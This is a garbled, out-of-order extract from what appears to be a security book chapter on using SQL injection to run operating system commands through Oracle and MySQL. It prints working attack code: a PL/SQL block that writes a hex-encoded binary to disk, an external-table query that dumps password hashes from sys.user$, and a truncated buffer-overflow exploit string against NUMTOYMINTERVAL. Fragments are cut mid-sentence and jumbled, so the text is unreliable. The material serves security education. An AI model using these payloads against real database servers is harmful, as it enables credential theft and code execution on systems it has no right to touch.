Utl file can write binary code the file system

300� Chapter�6�•�Exploiting�the�Operating�System

Figure 6.18 Compiling a Binary on SQL Server Using csc.exe

use csc.exe by running it out of the perfectly predictable DLL cache, %windir%\system32\

dllcache\csc.exe.

■ External tables

■ Java

Create or replace directory EXT AS 'C:\';
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
BEGIN
bu:=hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083C40 2CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC3558BEC8B5E 088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F2C20576F726C64210D0A'); fi:=UTL_FILE.fopen('EXT','hello.com','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

create directory EXT as 'C:\';
CREATE TABLE ext_write (
myline)
ORGANIZATION EXTERNAL
(TYPE oracle_datapump
DEFAULT DIRECTORY EXT
LOCATION ('victim3.txt'))
PARALLEL
AS
SELECT 'I was here' from dual UNION SELECT name||'='||password from sys.user$;

You can find Java sample code on Marco Ivaldi’s Web page, at www.0xdeadbeef.info/

normally searched for because of the high level of privileges with which most database

servers run. A remote exploit against Apache will, at best, result in a shell with a user ID

This section deals with executing operating system commands directly through SQL injection

by exploiting functionality built into the RDBMS.

Depending on the Oracle version, the following methods are available. Oracle EXTPROC,

Java, and DBMS_SCHEDULER are official methods from Oracle to run operating system

or CREATE EXTERNAL JOB (10g Rel. 2/11g) privileges. Since 10.2.0.2, the operating

system commands are no longer executed as user Oracle, but as user nobody.

are executed as user Oracle. There are no special requirements, as there are with Java and

EXTPROC variations. The only requirement for PL/SQL native is the right to modify the

normally be executed only as user SYS. In this example, we create a text file called e2.sql

which is executed by sqlplus. This sqlplus command is started via PL/SQL native.

In addition to the methods above, it can also be possible to execute operating system code

using other functionality within the database, including the following:

Alter System Set Events

Alter system set is an undocumented parameter (since Oracle 10g) that allows you to specify

Since 9i Rel. 2, Oracle offers the possibility to convert PL/SQL code into C code. To increase

the flexibility, Oracle allows you to change the name of the make utility (e.g., to calc.exe or

In 2004, Cesar Cerrudo published an exploit for a buffer overflow in the Oracle functions NUMTOYMINTERVAL and NUMTODSINTERVAL (see http://seclists.org/vulnwatch/ 2004/q1/0030.html). By using the following exploit, it was possible to run operating system commands on the database server:

SELECT NUMTOYMINTERVAL (1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)|| chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)|| chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE?

MySQL

MySQL does not natively support the execution of shell commands. Most times the attacker hopes that the MySQL server and Web server reside on the same box, allowing him to use the “select into DUMPFILE” technique to build a rogue Common Gateway Interface (CGI) on the target machine. The “create UDF” attack detailed by NGS Software (www.ngssoftware. com/papers/HackproofingMySQL.pdf ) is excellent thinking, but it’s not easy to do through an SQL injection attack (again because you cannot execute multiple queries separated by a command separator). Stacked queries are possible in MySQL 5 and later, but this has not been found in the wild very often (yet).